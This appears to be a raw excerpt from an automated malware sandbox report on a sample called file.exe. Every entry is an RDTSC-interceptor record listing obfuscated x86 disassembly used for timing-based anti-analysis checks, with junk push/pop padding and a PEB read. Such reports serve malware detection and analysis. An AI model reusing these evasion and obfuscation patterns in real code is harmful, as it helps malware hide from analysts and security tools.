Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 994F99 second address: 994F9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7E0E9 second address: A7E10A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FFAA4EF80D0h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007FFAA4EF80C6h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7E10A second address: A7E138 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF22h 0x00000007 jmp 00007FFAA4B0AF25h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7DF8E second address: A7DF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A87DAD second address: A87DBC instructions: 0x00000000 rdtsc 0x00000002 js 00007FFAA4B0AF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A86636 second address: A8663B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8663B second address: A8666D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4B0AF1Dh 0x00000009 jmp 00007FFAA4B0AF22h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FFAA4B0AF1Ah 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A867CE second address: A867EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A867EE second address: A8683F instructions: 0x00000000 rdtsc 0x00000002 js 00007FFAA4B0AF28h 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007FFAA4B0AF20h 0x0000000f je 00007FFAA4B0AF1Eh 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jnl 00007FFAA4B0AF27h 0x0000001f js 00007FFAA4B0AF22h 0x00000025 ja 00007FFAA4B0AF16h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8683F second address: A86843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A86843 second address: A8684B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8684B second address: A8684F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A86AFB second address: A86B23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAA4B0AF29h 0x00000009 jmp 00007FFAA4B0AF1Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A86C5E second address: A86C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A86DDA second address: A86E10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF27h 0x00000007 jmp 00007FFAA4B0AF27h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A87AB9 second address: A87ACD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFAA4EF80CBh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A87ACD second address: A87AF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FFAA4B0AF16h 0x00000009 jl 00007FFAA4B0AF16h 0x0000000f jmp 00007FFAA4B0AF21h 0x00000014 popad 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8B84D second address: A8B855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8B855 second address: A8B86F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAA4B0AF26h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6157 second address: AA617D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b jbe 00007FFAA4EF80C6h 0x00000011 push eax 0x00000012 pop eax 0x00000013 jmp 00007FFAA4EF80CEh 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA617D second address: AA6181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6181 second address: AA619D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4EF80D6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA619D second address: AA61A2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAEA71 second address: AAEA8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAEA8F second address: AAEAC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4B0AF25h 0x00000009 popad 0x0000000a jmp 00007FFAA4B0AF28h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAEC2F second address: AAEC33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAEC33 second address: AAEC3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAEDC4 second address: AAEDCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF236 second address: AAF23A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF3C6 second address: AAF3CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF54A second address: AAF54E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF7CC second address: AAF7D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF7D4 second address: AAF7D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF7D8 second address: AAF7DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB2878 second address: AB287C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB292B second address: AB2930 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB2930 second address: AB2949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a jnp 00007FFAA4B0AF16h 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007FFAA4B0AF16h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB2949 second address: AB294D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB2C23 second address: AB2C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5EA4 second address: AB5EC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4EF80CBh 0x00000009 je 00007FFAA4EF80C6h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007FFAA4EF80D2h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5EC7 second address: AB5ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5ECD second address: AB5ED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5A73 second address: AB5A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FFAA4B0AF16h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jno 00007FFAA4B0AF16h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5A88 second address: AB5A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB074A second address: 4DB074E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB074E second address: 4DB0754 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0754 second address: 4DB0783 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b push ecx 0x0000000c mov ch, dl 0x0000000e pop ecx 0x0000000f mov edx, 08724C20h 0x00000014 popad 0x00000015 call dword ptr [74E5188Ch] 0x0000001b mov edi, edi 0x0000001d push ebp 0x0000001e mov ebp, esp 0x00000020 push ecx 0x00000021 mov ecx, dword ptr [7FFE0004h] 0x00000027 mov dword ptr [ebp-04h], ecx 0x0000002a cmp ecx, 01000000h 0x00000030 jc 00007FFAA4B3C9F5h 0x00000036 mov eax, 7FFE0320h 0x0000003b mov eax, dword ptr [eax] 0x0000003d mul ecx 0x0000003f shrd eax, edx, 00000018h 0x00000043 mov esp, ebp 0x00000045 pop ebp 0x00000046 ret 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0783 second address: 4DB0787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0787 second address: 4DB0797 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0797 second address: 4DB06AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 1F8C4114h 0x00000008 jmp 00007FFAA4EF80CDh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ecx 0x00000011 pushad 0x00000012 call 00007FFAA4EF80CCh 0x00000017 pushfd 0x00000018 jmp 00007FFAA4EF80D2h 0x0000001d add cx, 23F8h 0x00000022 jmp 00007FFAA4EF80CBh 0x00000027 popfd 0x00000028 pop esi 0x00000029 jmp 00007FFAA4EF80D9h 0x0000002e popad 0x0000002f ret 0x00000030 nop 0x00000031 xor esi, eax 0x00000033 lea eax, dword ptr [ebp-10h] 0x00000036 push eax 0x00000037 call 00007FFAA98A5867h 0x0000003c mov edi, edi 0x0000003e jmp 00007FFAA4EF80CDh 0x00000043 xchg eax, ebp 0x00000044 pushad 0x00000045 mov bh, ah 0x00000047 mov ecx, ebx 0x00000049 popad 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007FFAA4EF80D1h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90058 second address: 4D9005E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9005E second address: 4D90091 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FFAA4EF80D9h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FFAA4EF80CDh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90091 second address: 4D90097 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90097 second address: 4D9009B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9009B second address: 4D900BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FFAA4B0AF22h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D900BD second address: 4D900DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FFAA4EF80CBh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D900DE second address: 4D900E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D900E4 second address: 4D900E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D900E8 second address: 4D9017C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FFAA4B0AF1Dh 0x00000013 and cx, CAC6h 0x00000018 jmp 00007FFAA4B0AF21h 0x0000001d popfd 0x0000001e popad 0x0000001f push eax 0x00000020 pushad 0x00000021 call 00007FFAA4B0AF27h 0x00000026 pushfd 0x00000027 jmp 00007FFAA4B0AF28h 0x0000002c sub esi, 676DADC8h 0x00000032 jmp 00007FFAA4B0AF1Bh 0x00000037 popfd 0x00000038 pop eax 0x00000039 movsx ebx, cx 0x0000003c popad 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FFAA4B0AF1Ah 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9017C second address: 4D90180 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90180 second address: 4D90186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90186 second address: 4D9022F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [eax+10h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FFAA4EF80CEh 0x00000013 sbb cx, 6288h 0x00000018 jmp 00007FFAA4EF80CBh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FFAA4EF80D8h 0x00000024 and ch, FFFFFFE8h 0x00000027 jmp 00007FFAA4EF80CBh 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, esi 0x0000002f jmp 00007FFAA4EF80D6h 0x00000034 push eax 0x00000035 pushad 0x00000036 jmp 00007FFAA4EF80D1h 0x0000003b call 00007FFAA4EF80D0h 0x00000040 mov si, CCC1h 0x00000044 pop esi 0x00000045 popad 0x00000046 xchg eax, esi 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a push ecx 0x0000004b pop edi 0x0000004c mov di, ax 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9022F second address: 4D9023D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAA4B0AF1Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9023D second address: 4D90309 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [74E806ECh] 0x0000000e pushad 0x0000000f pushad 0x00000010 mov bh, D7h 0x00000012 mov ecx, 6DDB679Bh 0x00000017 popad 0x00000018 mov ah, E2h 0x0000001a popad 0x0000001b test esi, esi 0x0000001d jmp 00007FFAA4EF80D3h 0x00000022 jne 00007FFAA4EF909Eh 0x00000028 jmp 00007FFAA4EF80D6h 0x0000002d xchg eax, edi 0x0000002e pushad 0x0000002f mov ecx, 4858069Dh 0x00000034 mov ecx, 6D336F99h 0x00000039 popad 0x0000003a push eax 0x0000003b jmp 00007FFAA4EF80CFh 0x00000040 xchg eax, edi 0x00000041 pushad 0x00000042 pushfd 0x00000043 jmp 00007FFAA4EF80D4h 0x00000048 sub ch, 00000058h 0x0000004b jmp 00007FFAA4EF80CBh 0x00000050 popfd 0x00000051 pushad 0x00000052 pushad 0x00000053 popad 0x00000054 mov bh, ch 0x00000056 popad 0x00000057 popad 0x00000058 call dword ptr [74E50B60h] 0x0000005e mov eax, 750BE5E0h 0x00000063 ret 0x00000064 jmp 00007FFAA4EF80D7h 0x00000069 push 00000044h 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007FFAA4EF80D5h 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90309 second address: 4D90345 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b call 00007FFAA4B0AF1Ch 0x00000010 pop edx 0x00000011 push ecx 0x00000012 push edx 0x00000013 pop esi 0x00000014 pop ebx 0x00000015 popad 0x00000016 xchg eax, edi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FFAA4B0AF1Eh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90345 second address: 4D9034B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9034B second address: 4D9039B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FFAA4B0AF1Bh 0x0000000f xchg eax, edi 0x00000010 jmp 00007FFAA4B0AF26h 0x00000015 push dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FFAA4B0AF27h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D916A4 second address: 4D916AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D916AA second address: 4D9171B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFAA4EF80CCh 0x00000009 add esi, 41FAE578h 0x0000000f jmp 00007FFAA4EF80CBh 0x00000014 popfd 0x00000015 movzx esi, dx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ax, word ptr [esi+32h] 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FFAA4EF80D1h 0x00000026 sbb ecx, 05AE7616h 0x0000002c jmp 00007FFAA4EF80D1h 0x00000031 popfd 0x00000032 mov edx, ecx 0x00000034 popad 0x00000035 mov word ptr [edx+32h], ax 0x00000039 jmp 00007FFAA4EF80CAh 0x0000003e mov eax, dword ptr [esi+34h] 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9171B second address: 4D91721 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91721 second address: 4D91730 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAA4EF80CBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91730 second address: 4D91734 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91734 second address: 4D91765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+34h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FFAA4EF80CEh 0x00000014 sub ecx, 6F7583C8h 0x0000001a jmp 00007FFAA4EF80CBh 0x0000001f popfd 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91765 second address: 4D9176A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9176A second address: 4D91814 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 pushfd 0x00000007 jmp 00007FFAA4EF80CEh 0x0000000c or ecx, 029E8628h 0x00000012 jmp 00007FFAA4EF80CBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b test ecx, 00000700h 0x00000021 pushad 0x00000022 mov dl, al 0x00000024 pushfd 0x00000025 jmp 00007FFAA4EF80D1h 0x0000002a or ah, 00000046h 0x0000002d jmp 00007FFAA4EF80D1h 0x00000032 popfd 0x00000033 popad 0x00000034 jne 00007FFB14F66018h 0x0000003a jmp 00007FFAA4EF80CEh 0x0000003f or dword ptr [edx+38h], FFFFFFFFh 0x00000043 pushad 0x00000044 pushfd 0x00000045 jmp 00007FFAA4EF80CEh 0x0000004a jmp 00007FFAA4EF80D5h 0x0000004f popfd 0x00000050 mov ch, 8Bh 0x00000052 popad 0x00000053 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a mov ecx, 6F89D5DBh 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91814 second address: 4D91819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91819 second address: 4D91839 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov dh, 7Fh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a or dword ptr [edx+40h], FFFFFFFFh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 call 00007FFAA4EF80CEh 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91839 second address: 4D91881 instructions: 0x00000000 rdtsc 0x00000002 mov bx, C116h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007FFAA4B0AF27h 0x0000000e xor ecx, 723F5D9Eh 0x00000014 jmp 00007FFAA4B0AF29h 0x00000019 popfd 0x0000001a popad 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
